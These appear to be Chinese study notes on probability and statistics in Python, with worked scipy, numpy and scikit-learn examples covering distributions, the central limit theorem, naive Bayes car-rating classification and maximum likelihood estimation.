    ${\color{Red}{f(x)}} = \frac{1}{\sqrt{2\pi}\sigma}e{-\frac{(x-\mu)2}{2\sigma ^2}}, -\infty < x < +\infty$

    下面代码模拟实现了一个均值为$\mu$为 0 和方差$\sigma ^2$为 1 的正态分布

    import numpy as np
    from numpy import pi
    import matplotlib.pyplot as plt
    import scipy.stats as stats


    def test_norm_pmf():
    mu = 0 # 均值为 0
    sigma = 1 # 方差为 1
    x = np.arange(-5, 5, 0.1) # 分布随机变量 x
    fig, (ax0, ax1) = plt.subplots(ncols=2, figsize=(10, 5))

    # 概率密度函数
    y0 = (1 / ((np.sqrt(2 * pi) * sigma))) * np.exp(-(((x - mu) ** 2)) / (2 * sigma * sigma)) # f(x)
    ax0.plot(x, y0)
    ax0.set_title('Normal: $\mu$ = %.1f, $\sigma^2$ = %.1f' % (mu, sigma))
    ax0.set_xlabel('x')
    ax0.set_ylabel('概率密度函数 Probability density', fontsize=15)

    # 概率分布函数
    y1 = stats.norm.cdf(x, 0, 1) # F(x)
    ax1.plot(x, y1)
    ax1.set_title('Normal: $\mu$ = %.1f, $\sigma^2$ = %.1f' % (mu, sigma))
    ax1.set_xlabel('x')
    ax1.set_ylabel('概率分布函数 Cumulative density', fontsize=15)

    fig.subplots_adjust(wspace=0.4)
    plt.show()


    if __name__ == "__main__":
    test_norm_pmf()

    png

    7.8 高手点拨

    Python 有一个很好的统计推断包, 即 Scipy 中的 stats, 该模块包含了许多概率分布的随机变量, 以及多种常用的数据统计函数, 常用的统计函数如下:

    概念中文名英文名说明
    rvs产生服从指定分布的随机数Random variates of given size.
    pdf概率密度函数Probability Density Function连续性随机变量持有, $P(a<X\le b)=\int _ {a}^{b} f(x)dx$
    pmf概率质量函数Probability Mass Function离散型随机变量持有, 就是离散性随机变量的分布律, $f(x)=P{X = x _ {k}}$
    cdf累积分布函数Cumulative Distribution Fuction又称分布函数$p(X \le x)$
    ppf百分点函数Percent point functioncdf 的反函数
    Sf残差函数Survival function
    stats返回期望和方差(mean(),var())

    常见分布函数

    名称含义
    betabeta 分布
    fF 分布
    gamma伽马分布
    poisson泊松分布
    hypergeom超几何分布
    lognorm对数正态分布
    binom二项分布
    uniform均匀分布
    chi2卡方分布
    cauchy柯西分布
    laplace拉普拉斯分布
    rayleigh瑞利分布
    t学生 t 分布
    norm正态分布
    expon指数分布

    例 7.23 获得 norm 函数的使用说明

    正态分布随机函数

    from scipy import stats
    from scipy.stats import norm

    print(norm.__doc__)

    例 7.24 创建正态分布随机变量及绘图

    from scipy import stats
    from scipy.stats import norm
    import numpy as np
    import pylab as plt

    X = norm()
    Y = norm(loc = 1.0, scale = 2.0) # 正态分布期望 1.0, 标准差 2.0
    t = np.arange(-10, 10, 0.01)
    plt.plot(t, X.pdf(t), label='$X$', color="red")
    plt.plot(t, Y.pdf(t), "b--", label="$Y$")
    plt.legend()
    plt.show()

    png

    7.9 习题

    (1) 泊松分布

    已知某路口发生事故的概率是每天 2 次, 用 Python 编程求出此处一天发生 0、1、2、3、4 此事故的概率是多少?

    $P(X=r)=\frac {e^{-\lambda} \lambda^{r}}{r!}$, 其中 r 表示给定区间内发生事件的次数,$\lambda$表示每个区间的平均发生次数

    $X _{i}$01234
    $P(X=X _ {i})$$e^{-2}$$2e^{-2}$$2e^{-2}$$\frac{4}{3}e^{-2}$$\frac{2}{3}e^{-2}$
    import numpy as np
    from scipy import stats
    import matplotlib.pyplot as plt

    #解决中文显示问题
    plt.rcParams['font.sans-serif']=['SimHei']
    plt.rcParams['axes.unicode_minus'] = False

    # 定义随机变量
    mu4 = 2 # 平均值:每天发生 2 次事故
    # 发生事故次数,包含 0 次,1 次,2 次,3 次,4 次事故
    X4 = np.arange(0,5,1)
    pList4 = stats.poisson.pmf(X4,mu4) # poisson 泊松, pmf 离散型随机变量分布律
    print(pList4)
    # 绘图
    plt.plot(X4, pList4, marker='o', linestyle='None', alpha=0.75)
    plt.vlines(X4, 0, pList4, alpha=0.75)
    plt.xlabel('某路口发生 k 次事故')
    plt.ylabel('概率')
    for i in X4: # 标注数字
    plt.text(i, pList4[i], '%.3f' % pList4[i], ha='center', va='bottom')
    plt.title('泊松分布:平均值 mu=%i' % mu4)
    plt.show()
    [0.13533528 0.27067057 0.27067057 0.18044704 0.09022352]

    png

    8 描述统计规律 2——随机变量与概率统计

    • 从这章开始学的有点吃力了,原因是考研的数学二不考概统+本科期间概统没好好学。在重新看了几天川大徐后,开始入手。

    • 我认为这本书在这里的排版不太好,与教科书的顺序一致,内容上也涉及了很多第 9 章的内容。

    切比雪夫不等式

    $P{\left | X - \mu \right | \ge \varepsilon }\le \frac{\sigma2}{\varepsilon2}(\forall \varepsilon >0)$

    $X$落入以均值$\mu$为中心的$\varepsilon$邻域$(\mu - \varepsilon,\mu + \varepsilon)$的概率不低于$1-\frac{\sigma2}{\varepsilon2}$

    8.2 大数定律和中心极限定理

    8.2.1 大数定律

    对命题"当大量重复某一相同实验的时候, 其最后的实验结果可能会稳定在某一数值附近"给予严格论证.

    名称描述
    切比雪夫大数定律独立不同分布, 当 n 充分大时, n 个相互独立的随机变量的算术平均值将比较密集地聚集在它的数学期望附近
    辛钦大数定律独立同分布(切比雪夫大数定律的推论)
    伯努利大数定律一个事件 A 在 n 次独立重复实验中发生的频率$\frac{n _ {A}}{n}$依概率收敛于事件 A 发生的概率 p

    8.2.2 中心极限定理

    在一定条件下, 充分多的相互独立的随机变量的算术平均值将服从正态分布, 不管这些随机变量本身服从什么分布.

    名称描述
    列维——林德伯格独立同分布
    李雅普诺夫独立不同分布
    棣莫弗——拉普拉斯二项分布,独立同分布的特殊情况,表明正态分布是二项分布的极限分布
    定理 8.1 独立同分布的中心极限定理

    前 n 项和$S _ {n}=\Sigma ^{n} _ {k=1}X _ {k} \sim N(n\mu, n\sigma ^2)$

    算数平均值$\bar X = \frac {1}{n}\Sigma ^{n} _ {k=1}X _ {k} \sim N(\mu, \frac {\sigma ^2}{n})$

    算术平均值的标准化$Y _ {n} = \frac {\bar{X}-\mu}{\sigma / \sqrt{n}} \sim N(0,1)$

    无论{$X _ {k}$}服从什么分布,当 n 很大时,其前 n 项的算术平均值$\bar X$的标准化{$Y _ {k}$}服从正态分布 N(0,1)

    定理 8.2 棣莫弗——拉普拉斯定理

    设$X \sim b(n,p)$, 则当 n 很大时

    $P{a < x \le b}\approx \Phi(\frac{b-np}{\sqrt{np(1-p)}})-\Phi(\frac{a-np}{\sqrt{np(1-p)}})$

    • 我们曾用泊松分布近似地计算二项分布($p \le 0.1$时精确度较好), 而以上结论不受 p 值的大小限制

    • 当$n \ge 50$时, 上述正态分布的近似程度可以达到比较满意的精度, n 越大, 精度越高.

    例 8.13 验证中心极限定理

    设有$n$个随机变量$X _ {1},X _ {2},…,X _ {n}$相互独立,并服从$U\left [a,b\right ]$, 则
    $\bar X = \frac{1}{n}\Sigma^{n} _ {k=1}X _ {k}\sim N\left [ \frac{a+b}{2},\frac{(b-a)^2}{12n}\right]$

    import numpy as np
    import matplotlib.pyplot as plt
    import matplotlib as mpl
    from scipy import stats

    # 解决汉字显示
    mpl.rcParams["font.sans-serif"] = ["Microsoft YaHei"]
    mpl.rcParams["axes.unicode_minus"] = False

    f = plt.figure(figsize=(16, 8))
    mean, var = 0.5, 1.0/12 # [0, 1]范围内的均匀分布的均值和方差


    def p_norm(nvr):
    """
    绘制正态分布曲线
    """
    mu = mean
    sigma = np.sqrt(var/nvr)
    norm_dis = stats.norm(mu, sigma) # 定义正态分布对象
    norm_x = np.linspace(0, 1, 128) # 定义域
    pdf = norm_dis.pdf(norm_x) # f(X)
    plt.plot(norm_x, pdf, 'r', alpha=0.6, label='N(${0:.1f}, {1:.2f}^2$)'.format(mu, sigma))
    plt.legend(loc='upper left', prop={'size': 8})


    def sample(rv_num):
    """
    对随机变量(X1+X2+...)进行一次采样
    :return: 这些样本的平均值
    """
    single_sample_dist = stats.uniform(loc=0, scale=1) # 定义[0, 1]上的均匀分布对象
    x = 0
    for j in range(rv_num):
    x += single_sample_dist.rvs()
    x *= 1 / rv_num
    return x


    def plotHist(Sample_num, rv_num, n_):
    """
    画出 n 个随机变量和样本的直方图
    :param Sample_num: 样本数目
    :param rv_num: 随机变量的个数
    :param n_: 图例序号
    """
    x = np.zeros((Sample_num))
    sp = f.add_subplot(2, 2, n_)
    for i in range(Sample_num): # 采样 Sample_num 次
    x[i] = sample(rv_num)
    # 画出直方图
    plt.hist(x, 500, density=True, color='#348ABD', label='{}个随机变量'.format(rv_num))
    plt.setp(sp.get_yticklabels(), visible=False)
    # 画出正态分布曲线
    p_norm(rv_num)


    if __name__ == "__main__":
    Sample_num = 1000
    nvr = ([1, 2, 32, 64])
    for i in range(np.size(nvr)):
    plotHist(Sample_num, nvr[i], i + 1)
    plt.suptitle("服从均匀分布 U[0, 1]的多个随机变量和的均值逼近于正态分布")
    plt.show()

    png

    8.3 数理统计基本概念

    • 概率论中, 我们是在假设随机变量的分布已知的前提下去研究它的规律性, 但在数理统计中, 研究的随机变量分布是未知

    • 数理统计中, 通过对研究的随机变量进行重复独立地观察, 得到大量观察数据后进行统计分析(如数据是否服从某种分布, 其数据特征(数学期望, 方差等)如何, 从而对所研究的随机变量的分布做出种种推断)

    8.4 常用的统计量

    例 8.15 求样本的均值、方差和标准差的 3 种方法

    import numpy as np
    from math import sqrt

    # 生成样本数据
    nlist = range(0, 9_000_000)
    nlist = [float(i) / 1_000_000 for i in nlist]
    N = len(nlist)
    (1)定义法
    sum1 = 0.0  # 样本数据之和
    sum2 = 0.0 # 样本数据平方和
    for i in range(N):
    sum1 += nlist[i]
    sum2 += nlist[i] ** 2
    mean = sum1 / N # 平均值
    var = sum2 / N - mean ** 2 # 方差 D(X) = E(X ^ 2) - [E(X)] ^ 2
    std = sqrt(var) # 标准差 ^ 2 = 方差

    mean, var, std
    (4.499999500000001, 6.750000000000028, 2.5980762113533213)
    (2)借助 Numpy 的向量运算
    narray = np.array(nlist)
    sum1 = narray.sum()
    narray2 = narray * narray # 就这?
    sum2 = narray2.sum()
    mean = sum1 / N
    var = sum2 / N - mean ** 2
    std = sqrt(var)

    mean, var, std
    (4.4999994999999995, 6.749999999999915, 2.5980762113532996)
    (3)借助 Numpy 函数
    mean = np.mean(nlist)
    var = np.var(nlist)
    std = np.std(nlist)

    mean, var, std
    (4.4999994999999995, 6.749999999999914, 2.5980762113532996)

    8.4 最大似然估计(MLE)

    • 对于已经出现的样本值$x _ {1}, x _ {2},…,x _ {n}$,适当地选取参数$\theta$, 使实验结果出现的概率最大

    • 似然函数$L(x|\theta)$是不确定的, $L(x _ {1}, x _ {2}, …, x _ {n} | \theta )$是既定事实(模型已定, 参数未知)

    • $L(x _ {1}, x _ {2}, …, x _ {n} | \theta )$发生的概率为$\Pi ^{n} _ {i=1}\theta ^ {x _ {i}}(1-\theta)^{1-x _ {i}})$

    • 通过对$\theta$求导等方式, 求出当$\theta$为何值时, $L(x _ {1}, x _ {2}, …, x _ {n} | \theta )$发生的概率最大

    • 参考视频: 【概率统计】最大似然估计

    8.5 最大后验估计(MAP)

    • 在最大似然估计的基础上, 添加了先验信息, 在样本较少时有用

    • $argmax \left [{\color{Red} {ln p(\theta)} + {\color{Blue}{\Sigma ^{n} _ {i=1}ln p(x _ {i}|\theta)}}} \right ]$, 先验项 + 与 MLE 等效, 利用求导等方式, 判断当$\theta$为何值时, 原式最大

    • 参考视频: 极大似然与最大后验的关系-贝叶斯法的视频超分辨率

    8.6 综合实例 1——贝叶斯用户满意度预测

    1.问题描述

    根据一些已有的汽车汽车评测满意度测评数据集,可初步了解用户对于该类型汽车的满意程度。

    2.数据准备阶段

    特征属性属性值属性说明
    Buyingvhigh, high, med, low买入价
    Maintvhigh, high, med, low维护费
    Doors2,3,4,5more车门数
    Personsvhigh, high, med, low可容纳人数
    Lug-bootsmall, med, big后备箱大小
    Safetylow, med, high安全性
    import numpy as np
    import random
    import pandas as pd

    # 列名 = [买入价, 维护费, 车门数, 可容纳人数, 后备箱大小, 安全性, 汽车类别]
    columnsName=['buying', 'maint', 'doors', 'persons','lug-boot','safety','label']


    def getDataSet(file):
    """
    从数据集中获得数据
    """
    fr = open(file)
    rdata = []
    for line in fr.readlines():
    tmp = line.strip().split(',') # 这个文件以逗号分割数据
    rdata.append(tmp)
    df = pd.DataFrame(rdata) # 读入数据到 DATAFrame 变量 df,类似二维表
    df.columns = columnsName # 设置 df 的列名
    return df


    def getTrainTest(data, trainNum):
    """
    随机抽取数据,将数据集分成训练集和测试集
    :return: 训练集, 测试集
    """
    # 从 0 到 len(data)整数列表中随机截取 trainNum 个整数片段
    """
    语法:random.sample(sequence, k)
    参数:
    sequence: 可以是一个列表,元组,字符串,或集合
    k: 一个整数值,它指定一个样本的长度
    返回:从序列中选择元素的 k 长度的新列表。
    """
    choose = random.sample(range(len(data)), trainNum)
    choose.sort()
    j = 1
    dftrain = pd.DataFrame(columns=columnsName)
    dftest = pd.DataFrame(columns=columnsName)
    for i in range(1,len(data)):
    # 如果被随机选中,加入训练集,否则测试集
    if (j < trainNum and i == choose[j]):
    dftrain.loc[dftrain.shape[0]]=data.iloc[i]
    j += 1
    else:
    dftest.loc[dftrain.shape[0]]=data.iloc[i]
    return dftrain, dftest

    3.创建一个实现朴素贝叶斯模型的类 NBClassify

    4.定义训练函数 train()

    5.数据预测

    class NBClassify(object):
    """
    定义朴素贝叶斯模型
    """
    def __init__(self):
    # tabProbablity 核心字典,记录各类别的先验概率,格式:{'unacc':概率值, 'acc': 概率值, 'vgood': 概率值, 'good': 概率值}
    _tagProbablity = None
    # featuresProbablity 核心字典,记录各类别下各特征取值的条件概率。三级字典,
    # 格式:类别 1: {'特征 1': {'值 1': 概率值, ...'值 n': 概率值}, '特征 2':{}...},类别 2:{'特征 1': {'值 1': 概率值, ...'值 n': 概率值},
    _featuresProbablity = None

    def train(self,df):
    """
    4.定义训练函数
    利用训练数据分别计算类先验概率和似然概率
    """
    # value_counts: 查看 label 这一列的计数结果
    self._tagProbablity = df['label'].value_counts(value for value in df['label'])
    print("各类别的先验概率(各类别占比):\n", self._tagProbablity)

    # 计算各特征及对应取值的出现次数 dictFeaturesBase
    # 格式:{特征 1:{值 1:出现 5 次, 值 2:出现 1 次}, 特征 2:{值 1:出现 1 次, 值 2:出现 5 次}}
    dictFeaturesBase = {}.fromkeys(df.columns) # 创建一个字典
    for column in df.columns: # 遍历数据各列
    seriesFeature = df[column].value_counts()
    dictFeaturesBase[column] = seriesFeature
    # 从特征值字典删去类别信息
    del dictFeaturesBase['label']

    # 初始化字典 dictFeatures
    # 格式:{类别 1:{'特征 1':{'值 1':None,...'值 n':None},'特征 2':{...}},类别 2:{'特征 1':{'值 1':None, ...},...}
    dictFeatures = {}.fromkeys(df['label'])
    for key in dictFeatures.keys():
    dictFeatures[key] = {}.fromkeys([key for key in dictFeaturesBase])
    for key, value in dictFeatures.items():
    for subkey in value.keys():
    value[subkey] = {}.fromkeys([x for x in dictFeaturesBase[subkey].keys()])
    # 计算各类别、对应特征及对应取值的出现次数,存入字典 dictFeatures
    for i in range(0, len(df)):
    label = df.iloc[i]['label'] # df.iloc: 官方文档定义为“基于整数位置的索引,用于按位置进行选择。类别
    for feature in columnsName[0:6]: # 对应的特征
    fvalue = df.iloc[i][feature] # 对应的特征取值
    if dictFeatures[label][feature][fvalue] == None:
    dictFeatures[label][feature][fvalue] = 1 # 该类别下该特征值第一个出现的样本
    else:
    dictFeatures[label][feature][fvalue] += 1 # 如果已有,次数加一

    # 该类数据集若未涵盖此特征值时,加入 Laplace 平滑项
    # 拉普拉斯平滑(Laplace Smoothing)又被称为加 1 平滑,是比较常用的平滑方法。
    # 平滑方法的存在时为了解决零概率问题。比较多地出现在文本分类问题的概率处理上
    # https://blog.csdn.net/weixin_43868020/article/details/106602799
    for tag, featuresDict in dictFeatures.items():
    for featureName, featureValueDict in featuresDict.items():
    for featureKey, featureValues in featureValueDict.items():
    if featureValues == None:
    featureValueDict[featureKey] = 1

    # 由字典 dictFeatures 计算每个类别下每种特征对应值的概率,即特征的似然概率 P(feature|tag)
    for tag, featuresDict in dictFeatures.items():
    for featureName, featureValueDict in featuresDict.items():
    totalCount = sum([x for x in featureValueDict.values() if x != None])
    for featureKey, featureValues in featureValueDict.items():
    featureValueDict[featureKey] = featureValues / totalCount
    self._featuresProbablity = dictFeatures
    print("每个类别下每种特征对应值的似然概率:\n", dictFeatures)

    def classify(self, featureTuple):
    """
    对测试集进行预测
    :return: 最大后验概率的类别
    """
    resultDict = {}
    # 计算样本属于每个类别的后验概率
    for tag, featuresDict in self._featuresProbablity.items():
    iNumList = []
    i=0
    # 将各特征值对应的似然概率添加到列表 iNumList
    for feature,featureValueDict in featuresDict.items():
    featureValue = str(featureTuple[i])
    iNumList.append(self._featuresProbablity[tag][feature][featureValue])
    i=i+1
    # 列表 iNumList 中的概率相乘,得到似然概率
    conditionProbability = 1
    for iNum in iNumList:
    conditionProbability *= iNum
    # 将先验概率乘以似然概率得到后验概率 resultDict
    resultDict[tag] = self._tagProbablity[tag] * conditionProbability
    # 对比每个类别的后验概率 resultDict 的大小
    resultList = sorted(resultDict.items(), key=lambda x: x[1], reverse=True)
    # 返回最大后验概率的类别
    return resultList[0][0]

    6.主程序

    if __name__ == '__main__':
    dfData = getDataSet('car.txt')
    # 避免过拟合,采用交叉验证,随机选取 1500 个数据作为测试集,剩余为训练集
    # 交叉验证: 在给定的建模样本中,拿出大部分样本进行建模型,留小部分样本用刚建立的模型进行预报,
    # 并求这小部分样本的预报误差,记录它们的平方加和。
    trainData, testData = getTrainTest(dfData, 1500)
    # 定义朴素贝叶斯模型
    model = NBClassify()
    # 代入训练数据集,进行模型训练
    model.train(trainData)
    # 对测试数据集进行预测,并计算错误率
    errorCount = 0
    for i in range(0, len(testData)):
    result = model.classify(testData.iloc[i][0:6])
    # 将预测的类别和实际值比较
    if testData.iloc[i][6] != result:
    errorCount += 1
    print("精度为 %f" % ((float(len(testData)) - float(errorCount)) / len(testData)))
    各类别的先验概率: unacc    0.701134acc      0.223482good     0.040027vgood    0.035357Name: label, dtype: float64每个类别下每种特征对应值的似然概率: {'unacc': {'buying': {'low': 0.21693625118934348, 'med': 0.22645099904852523, 'vhigh': 0.29590865842055186, 'high': 0.26070409134157946}, 'maint': {'med': 0.23311132254995243, 'vhigh': 0.29971455756422455, 'high': 0.25499524262607043, 'low': 0.21217887725975262}, 'doors': {'4': 0.24262607040913417, '2': 0.26831588962892483, '5more': 0.2407231208372978, '3': 0.2483349191246432}, 'persons': {'4': 0.2597526165556613, '2': 0.47573739295908657, 'more': 0.26450999048525214}, 'lug-boot': {'med': 0.3273073263558516, 'big': 0.3016175071360609, 'small': 0.37107516650808753}, 'safety': {'med': 0.29305423406279735, 'high': 0.2340627973358706, 'low': 0.47288296860133205}}, 'acc': {'buying': {'low': 0.2417910447761194, 'med': 0.2955223880597015, 'vhigh': 0.18507462686567164, 'high': 0.27761194029850744}, 'maint': {'med': 0.3044776119402985, 'vhigh': 0.1791044776119403, 'high': 0.27761194029850744, 'low': 0.23880597014925373}, 'doors': {'4': 0.2716417910447761, '2': 0.21791044776119403, '5more': 0.2626865671641791, '3': 0.24776119402985075}, 'persons': {'4': 0.5238095238095238, '2': 0.002976190476190476, 'more': 0.4732142857142857}, 'lug-boot': {'med': 0.35522388059701493, 'big': 0.382089552238806, 'small': 0.2626865671641791}, 'safety': {'med': 0.4791666666666667, 'high': 0.5178571428571429, 'low': 0.002976190476190476}}, 'vgood': {'buying': {'low': 0.5636363636363636, 'med': 0.4, 'vhigh': 0.01818181818181818, 'high': 0.01818181818181818}, 'maint': {'med': 0.3888888888888889, 'vhigh': 0.018518518518518517, 'high': 0.18518518518518517, 'low': 0.4074074074074074}, 'doors': {'4': 0.32075471698113206, '2': 0.16981132075471697, '5more': 0.3018867924528302, '3': 0.20754716981132076}, 'persons': {'4': 0.4444444444444444, '2': 0.018518518518518517, 'more': 0.5370370370370371}, 'lug-boot': {'med': 0.37037037037037035, 'big': 0.6111111111111112, 'small': 0.018518518518518517}, 'safety': {'med': 0.01818181818181818, 'high': 0.9636363636363636, 'low': 0.01818181818181818}}, 'good': {'buying': {'low': 0.6612903225806451, 'med': 0.3064516129032258, 'vhigh': 0.016129032258064516, 'high': 0.016129032258064516}, 'maint': {'med': 0.3225806451612903, 'vhigh': 0.016129032258064516, 'high': 0.016129032258064516, 'low': 0.6451612903225806}, 'doors': {'4': 0.2833333333333333, '2': 0.23333333333333334, '5more': 0.26666666666666666, '3': 0.21666666666666667}, 'persons': {'4': 0.5081967213114754, '2': 0.01639344262295082, 'more': 0.47540983606557374}, 'lug-boot': {'med': 0.3333333333333333, 'big': 0.35, 'small': 0.31666666666666665}, 'safety': {'med': 0.5409836065573771, 'high': 0.4426229508196721, 'low': 0.01639344262295082}}}精度为 0.848485

    7.利用 scikit-mean 库直接实现朴素贝叶斯方法

    • Scikit-learn 是一个开源的机器学习库,它支持有监督和无监督的学习。它还提供了用于模型拟合,数据预处理,模型选择和评估以及许多其他实用程序的各种工具。

    • 包含 3 个朴素贝叶斯的分类算法

    种类说明适用
    GaussianNB假设每个标签的数据都服从简单的正态分布样本的特征的分布大部分是连续值
    MultinationalNB假设特征是由一个简单多项式分布生成的用于描述出现次数或者出现比例的特征
    BernoulliNB假设特征的先验概率为二元伯努利分布样本特征是二元离散值或很稀疏的多元离散值
    import pandas as pd
    import numpy as np
    import random
    from sklearn.naive_bayes import BernoulliNB

    columnsName=['buying', 'maint', 'doors', 'persons','lug-boot','safety','label']


    def getDataSet(file):
    """
    从数据集中获得数据,并进行整理
    """
    fr = open(file)
    rdata = []
    for line in fr.readlines():
    tmp = line.strip().split(',')
    rdata.append(tmp)
    df = pd.DataFrame(rdata)
    df.columns = columnsName
    # feature_codes 记录特征及数据标签的编码表,如:'buying'特征的取值及对应的编码:'vhigh': 0, 'high': 1, 'med': 2, 'low': 3
    feature_codes = [{'vhigh': 0, 'high': 1, 'med': 2, 'low': 3},
    {'vhigh': 0, 'high': 1, 'med': 2, 'low': 3},
    {'2': 0, '3': 1, '4': 2, '5more': 3},
    {'2': 0, '4': 1, 'more': 2},
    {'small': 0, 'med': 1, 'big': 2},
    {'high': 0, 'med': 1, 'low': 2},
    {'unacc':0,'acc': 1,'good': 2,'vgood':3} ]
    for i in range(0,7):
    df.iloc[:, i] = df.iloc[:,i].map(feature_codes[i])
    # Xtrain, Xtest, Ytrain, Ytest = train_test_split(df.iloc[:, 1:6], df.iloc[:, 7], test_size=0.17, random_state=420)
    return df


    def getTrainTest(data, trainNum):
    """
    随机抽取数据,将数据集分成训练集和测试集
    """
    # 从 0 到 len(data)整数列表中随机截取 trainNum 个片段
    choose = random.sample(range(len(data)), trainNum)
    choose.sort()
    j = 1
    dftrain = pd.DataFrame(columns=columnsName)
    dftest = pd.DataFrame(columns=columnsName)
    for i in range(1,len(data)):
    # 如果被随机选中,加入训练集,否则测试集
    if (j < trainNum and i == choose[j]):
    dftrain.loc[dftrain.shape[0]]=data.iloc[i]
    j += 1
    else:
    dftest.loc[dftrain.shape[0]]=data.iloc[i]
    return dftrain, dftest
    dfData = getDataSet('car.txt')
    dfData
    buying maint doors persons lug-boot safety label
    0 0 0 0 0 0 2 0
    1 0 0 0 0 0 1 0
    2 0 0 0 0 0 0 0
    3 0 0 0 0 1 2 0
    4 0 0 0 0 1 1 0
    ... ... ... ... ... ... ... ...
    1723 3 3 3 2 1 1 2
    1724 3 3 3 2 1 0 3
    1725 3 3 3 2 2 2 0
    1726 3 3 3 2 2 1 2
    1727 3 3 3 2 2 0 3

    1728 rows × 7 columns

    # 设置训练集和测试集
    trainData, testData = getTrainTest(dfData, 1500)
    train_X = trainData.iloc[:, :-1]
    train_Y = np.asarray(trainData.iloc[:, -1], dtype="|S6")
    test_X = testData.iloc[:, :-1]
    test_Y = np.asarray(testData.iloc[:, -1], dtype="|S6")

    train_X
    buying maint doors persons lug-boot safety
    0 0 0 0 0 0 1
    1 0 0 0 0 0 0
    2 0 0 0 0 1 1
    3 0 0 0 0 2 2
    4 0 0 0 0 2 1
    ... ... ... ... ... ... ...
    1494 3 3 3 2 1 1
    1495 3 3 3 2 1 0
    1496 3 3 3 2 2 2
    1497 3 3 3 2 2 1
    1498 3 3 3 2 2 0

    1499 rows × 6 columns

    train_Y  # 训练集的测评结果
    array([b'0', b'0', b'0', ..., b'0', b'2', b'3'], dtype='|S6')
    test_X # 训练集输入
    buying maint doors persons lug-boot safety
    2 0 0 0 0 1 2
    3 0 0 0 0 1 0
    11 0 0 0 1 1 0
    26 0 0 1 0 1 2
    29 0 0 1 0 2 1
    ... ... ... ... ... ... ...
    1458 3 3 2 0 2 0
    1460 3 3 2 1 0 0
    1465 3 3 2 1 2 0
    1476 3 3 3 0 0 0
    1489 3 3 3 1 2 1

    204 rows × 6 columns

    """
    alpha : 浮点数, 可不填 (默认为 1.0)
    拉普拉斯或利德斯通平滑的参数λ,如果设置为 0 则表示完全没有平滑选项。
    但是需要注意的是,平滑相当于人为给概率加上一些噪音,
    因此λ设置得越大,伯努利朴素贝叶斯的精确性会越低(虽然影响不是非常大),布里尔分数也会逐渐升高。
    binarize : 浮点数或 None,可不填,默认为 0
    将特征二值化的阈值,如果设定为 None,则假定为特征已经被二值化完毕
    fit_prior : 布尔值, 可不填 (默认为 True)
    是否学习先验概率 P(Y=c)。如果设置为 false,则不使用先验概率,而使用统一先验概率(uniform prior),
    即认为每个标签类出现的概率是 1/n_classes
    class_prior:形似数组的结构,结构为(n_classes, ),可不不填(默认为 None)
    """
    clf = BernoulliNB()
    clf.fit(train_X, train_Y) # 训练
    predicted = clf.predict(test_X)
    predicted
    array([b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0',       b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'1', b'0', b'0',       b'0', b'0', b'0', b'1', b'0', b'0', b'0', b'0', b'0', b'0', b'1',       b'0', b'1', b'0', b'0', b'0', b'0', b'0', b'0', b'1', b'0', b'0',       b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0',       b'1', b'0', b'0', b'0', b'0', b'0', b'1', b'0', b'0', b'0', b'1',       b'0', b'0', b'0', b'0', b'0', b'0', b'1', b'1', b'0', b'0', b'0',       b'0', b'1', b'1', b'0', b'0', b'1', b'0', b'0', b'0', b'1', b'0',       b'0', b'0', b'0', b'1', b'0', b'0', b'0', b'0', b'0', b'0', b'0',       b'1', b'1', b'0', b'1', b'0', b'0', b'0', b'0', b'0', b'0', b'0',       b'0', b'1', b'1', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0',       b'0', b'0', b'0', b'0', b'0', b'1', b'0', b'0', b'0', b'0', b'0',       b'0', b'0', b'1', b'0', b'1', b'0', b'0', b'0', b'0', b'0', b'0',       b'0', b'0', b'1', b'0', b'1', b'0', b'0', b'0', b'1', b'0', b'1',       b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'1',       b'1', b'1', b'0', b'0', b'0', b'0', b'0', b'1', b'0', b'0', b'0',       b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0',       b'0', b'0', b'0', b'1', b'1', b'0', b'0', b'0', b'0', b'1', b'0',       b'0', b'0', b'1', b'1', b'0', b'0'], dtype='|S1')
    print('精度为:%f ' % np.mean(predicted == test_Y))
    精度为:0.774725 

    8.7 综合实例 2——最大似然法求解模型参数

    数据集 QQ_data.txt 中会收集每天发出 QQ 消息的个数, 利用最大似然法估计总体分布的模型参数

    (1) 读取数据集"QQ_data.csv", 显示数据分布情况

    import pandas as pd
    import matplotlib.pyplot as plt

    messages = pd.read_csv('QQ_data.csv') #读取数据
    fig = plt.figure(figsize=(12,5))
    plt.title('Frequency of QQmessages')
    plt.xlabel('Number of QQmessages')
    plt.ylabel('Frequency')
    plt.hist(messages['numbers'].values,range=[0, 60], bins=60, histtype='stepfilled') # 以列名为"numbers"的数据绘制直方图
    plt.show()

    png

    (2) 利用最大似然估计法求出参数$\mu$

    似然函数定义:

    $L(x;\mu)=\Pi^{n} _ {i=1}P(x _ {i};\mu)$

    为了运算方便, 通常等式两边同取对数:

    $lnL(x;\mu)=\Sigma^{n} _ {i=1}lnP(x _ {i};\mu)$

    import matplotlib.pyplot as plt
    import numpy as np
    import pandas as pd
    import scipy
    import scipy.stats as stats
    import scipy.optimize as opt
    import statsmodels.api as sm

    messages = pd.read_csv('QQ_data.csv') #读取数据
    y_obs = messages['numbers'].values
    np.seterr(invalid='ignore')


    def poisson_logprob(mu, sign=-1):
    """
    :params mu: 泊松模型的参数值
    :params sign: 系数
    :return: 观测数据的总似然值
    """
    print(" 参数 mu: ", mu)
    """
    方法 stats.poisson.logpmf(y_obs, mu=mu) 计算在给定点 y_obs 值上服从泊松分布(参数值为 mu)的概率对数值,
    然后使用 np.sum 求和得到似然函数值
    """
    return np.sum(sign * stats.poisson.logpmf(y_obs, mu=mu))


    """
    方法 opt.minimize_scalar 通过不断迭代参数(mu), 求出(似然)函数的最小值,
    因此在(似然)函数前加上负号(就可以求出(似然)函数的最大值)
    https://vimsky.com/examples/usage/python-scipy.optimize.minimize_scalar.html
    """
    freq_results = opt.minimize_scalar(poisson_logprob)
    print("参数 mu 的估计值: %s" % freq_results['x'])

